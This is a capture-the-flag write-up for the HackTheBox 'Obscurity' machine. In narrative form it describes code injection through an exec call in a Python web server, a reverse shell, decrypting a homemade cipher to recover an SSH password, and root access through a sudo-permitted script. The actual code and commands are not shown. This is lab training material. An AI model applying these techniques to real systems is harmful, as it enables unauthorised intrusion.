HackTheBox Writeup — Obscurity

Hello Guys , I am Faisal Husaini. My username on HTB is “ferllen” . Also join me on discord.

The IP of this box is

Port Scan

We get 2 Open Ports and 2 Closed Ports, so we now run service scan for each one of those open ports

So on the Open Ports we see that we have one for SSH and other for Web Part on 22 and 8080 respectively. I still don't know why NMAP gave results for Closed Ports

Moving onto the web part

Port 8080 — Web

We see that its a webpage related to security , scrolling further more

We see we have a Development section and also we a message to the server devs that the source code of the web server running is in a secret development directory by the filename “SuperSecureServer.py”

So we run a simple bash script to automate the bruteforcing of directory search and then we get a successful hit , i.e, develop

Now trying to access the source code

We see its a long code, but reading carefully each functions, we get one which looks interesting

On the function serveDoc, we see that it tries to use the exec function on the path, so I just copy some lines of the function to my local machine and try to exploit it manually first

These lines were copied and now we execute our python script

We see that we can successfully perform code execution by just escaping with a semicolon followed by the os.system function which will then be followed by our system commands

So here we try to get reverse shell and looking back to the netcat listener

We got reverse shell successfully, looking further to what we have here

We have a user folder robert and inside that folder we see alot of txt files and also py files , we also have the user.txt flag which we currently cant read as only user Robert has the permissions to read it

We also see an interesting python script SuperSecureCrypt.py , looking at the code

Looking more into the code

The code uses addition and modulo to encrypt/decrypt the files and we see that we have two text files check.txt and passwordreminder.txt

We see one text file has a clear text message and the other has the encrypted, so there might be some kind of XOR happening

Here now I use a python code to reverse the encryption

Now we run the script

We see we got a name alexandrov, which actually wasn’t fully decrypted and I needed a help from a friend here. So the full decryption was alexandrovich

We now move onto decrypting the passwordreminder.txt using the key we got and save it to a txt file in the tmp folder and after reading the file , we see the password is SecThruObsFTW

We tried connecting to user robert through SSH with the password which we decrypted and successfully logged in and got the user flag access

Privilege Escalation

We see that we can run sudo as user robert without password on /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py

Checking the BetterSSH.py code

Looking further more down

From the above code, we can see that if we have an authenticated session, it runs sudo -u user

We got authenticated and then return back to a shell, using the -l , we get an Error in the output and then we see that we get the usage of the sudo command

So now we know its running sudo already, we just append down the below commands

This commands leads us to run bash as root user from sudo command, but we don't get any output back, hence, we try to get reverse shell and checking back to the netcat listener

We got reverse shell as root successfully, moving back to get the root flag

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover